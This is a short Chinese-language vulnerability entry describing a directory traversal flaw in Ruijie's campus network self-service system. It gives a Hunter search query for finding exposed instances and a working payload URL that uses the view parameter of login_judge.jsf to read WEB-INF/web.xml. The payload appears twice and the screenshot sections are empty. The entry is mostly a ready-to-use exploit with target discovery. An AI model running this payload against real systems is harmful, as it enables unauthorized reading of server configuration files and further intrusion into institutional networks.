R3-1锐捷-校园网自助服务系统-目录遍历
漏洞描述:
锐捷网络股份有限公司校园网自助服务系统存在目录穿越漏洞
网站图片:
网络测绘:
Hunter 语法:
- hunterapp=“校园网自助服务系统”
漏洞复现:
payload:
/selfservice/selfservice/module/scgroup/web/login_judge.jsf?view=./WEB-INF/web.xml%3F
效果图:
锐捷网络股份有限公司校园网自助服务系统存在目录穿越漏洞
payload:
/selfservice/selfservice/module/scgroup/web/login_judge.jsf?view=./WEB-INF/web.xml%3F
效果图: